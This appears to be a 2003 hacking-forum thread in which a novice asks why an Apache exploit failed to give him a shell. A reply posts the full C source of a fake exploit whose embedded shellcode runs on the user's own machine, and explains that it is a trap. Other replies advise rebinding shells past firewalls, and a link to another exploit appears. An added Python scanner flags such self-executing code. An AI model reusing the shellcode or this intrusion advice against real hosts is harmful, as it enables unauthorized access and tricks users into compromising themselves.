newbie
Aug 23 2003, 09:07 PM
i exploited it once and tried to connect through telnet
but it didn't connect
then i used scan500 to scan the apache hole and it was found so i tried again and through netcat too but nothin
any solution?
Velle
Aug 23 2003, 09:49 PM
There's a good chance that the host is firewalled
Just keep trying, you'll find something eventually

Just make sure you're not blocking any ports...
GAN_GR33N
Aug 23 2003, 10:20 PM
it is possible that it is not vulnerable. sometimes scanners will give you false positives. in my experience using only a port scanner and then checking the results by hand is a much more solid way of doing it. this can be very difficult when checking a large network or drive by hacking (not the most noble effort) but works great for smaller jobs.
if the case of the firewall is true just alter the source code of the exploit to bind a shell to an open port.
newbie
Aug 24 2003, 09:46 AM
no it turned out to be 1.3.27 and i scanned 1.3.x
and the and i have an exploit only for 1.3.27 and below
FLW
Aug 24 2003, 12:32 PM
Which exploit only for 1.3.27 or below are you looking at?
shaun2k2
Aug 24 2003, 02:17 PM
Damn. When will people stop being such script kiddies. You *shouldn't* be trying to run these exploits if you do not even know what they do. It's dangerous, I promise you.
1) It could be harming your computer.
2) You don't know how it works, so you probably don't know enough to get yourself out of trouble.
This might sound like a flame, but it's not, honestly. Look at point 1). I say it could be harming your computer. In this case it IS.
Is this the exploit you're trying to use:
| CODE |
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static char shellcode[] = { "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21" "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68" "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d" "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00" "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02" "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d" "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67" "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00" "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc" "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50" "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1" "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24" "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44" "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89" "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0" };

int main(int *argc, char **argv)
{
    int i;
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if((int)argc < 3 ) {
        printf("usage: %s <target> <shell port>\n", argv[0]);
        printf("ex: %s google.com 31337\n", argv[0]);
        exit(0);
    }

    buffer = (char *) malloc(512 + 1024 + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[512 - strlen(shellcode)], shellcode, strlen(shellcode));
    buffer[512 + 1024] = ';';
    buffer[512 + 1024 + 1] = '\0';
    void(*b)()=(void*)shellcode;b();
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Server doesn't exist\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Cannot open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("Attempting to Exploit...\n");
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("Success!!!\n");
    else
        printf("No go there tough guy!\n");
    printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));
}
|
Well, if it is, you are ridiculous running it.
| QUOTE |
void(*b)()=(void*)shellcode;b();
|
I told you that you shouldn't be trying to run them without programming knowledge. Do you know what that line of code does? It runs the shellcode on YOUR computer. Meaning that whatever the shellcode does, is happening to you. Meaning that if the shellcode makes a rootshell with no password, YOU are being fooled. This was a FAKE exploit, written by kiddies, to fool people.
CURRENTLY, the only vulnerability known in Apache 1.3.27 is something to do with stopping log files or something.
Sorry about this whole post....but you shouldn't run something if you don't know what it's doing guys.
-Shaun.
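The check described in the post above, reading a proof-of-concept for code that executes its own byte array on the machine that runs it, can be partly automated before anything is compiled. The following Python sketch is an added example, not part of the original thread; the sample sources and function names are constructed, and a regex pass like this only catches the plain cast-and-call forms.

```python
import re

# Constructed sample: a cut-down "exploit" with the same trap as the quoted one.
SAMPLE_FAKE = r'''
static char shellcode[] = { "\x31\xdb\x31\xc0" "\xcd\x80" };
int main(int argc, char **argv) {
    char *buffer = malloc(2048);
    memcpy(buffer, shellcode, strlen(shellcode));
    void(*b)()=(void*)shellcode;b();
    send(s, buffer, strlen(buffer), 0);
}
'''
# Constructed sample: the byte array is only sent to the remote host.
SAMPLE_NETWORK_ONLY = r'''
static char payload[] = "\x41\x41\x41\x41";
int main(void) { send(s, payload, sizeof(payload) - 1, 0); return 0; }
'''

# A char array or pointer initialised from "\xNN" string literals.
BYTE_ARRAY = re.compile(r'\bchar\s*\*?\s*(\w+)\s*(?:\[[^\]]*\])?\s*=\s*\{?\s*"\\x[0-9a-fA-F]{2}')


def find_local_execution(source):
    """Return (array, line_no, reason) wherever an embedded byte array is run locally."""
    findings = []
    lines = source.splitlines()
    for array in BYTE_ARRAY.findall(source):
        name = re.escape(array)
        # void (*fp)() = (void *)array;  followed later by  fp();
        assign = re.compile(r'\(\s*\*\s*(\w+)\s*\)\s*\([^)]*\)\s*=\s*(?:\([^;()]*\))?\s*&?' + name + r'\b')
        # ((void (*)())array)();
        direct = re.compile(r'\(\s*\*\s*\)\s*\([^)]*\)\s*\)\s*&?' + name + r'\s*\)\s*\(')
        for no, line in enumerate(lines, 1):
            m = assign.search(line)
            if m:
                call = re.compile(r'\b' + re.escape(m.group(1)) + r'\s*\(')
                if any(call.search(later) for later in lines[no - 1:]):
                    findings.append((array, no, "called through pointer " + m.group(1)))
            if direct.search(line):
                findings.append((array, no, "cast to function and called"))
    return findings


if __name__ == "__main__":
    for label, src in (("fake", SAMPLE_FAKE), ("network-only", SAMPLE_NETWORK_ONLY)):
        print(label, find_local_execution(src) or "no local execution found")
```

A finding means the byte array runs on the local machine, so the source should be read line by line, and any test run confined to a disposable VM.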
newbie
Aug 24 2003, 02:33 PM
no it's not it...
and i read the exploits briefly
to see the pattern if it looks weird i don't touch it
here's the exploit
http://geestart.de/test/apache-linux-ssl.c
and btw you're right that exploit i wouldn't recognize cuz i have poor knowledge
in exploits and i know basic cpp
im still looking for a normal socket programming tut
OneNight
Aug 24 2003, 02:40 PM
Thx for that reply Shaun. Well said. Good to have ur knowledgeable input on this.
shaun2k2
Aug 24 2003, 02:48 PM
Hmm. That exploit isn't for Apache 1.3.27, but I notice you realise that now.
-Shaun.
dozolax
Dec 20 2003, 03:28 AM
haha...u probably should check that first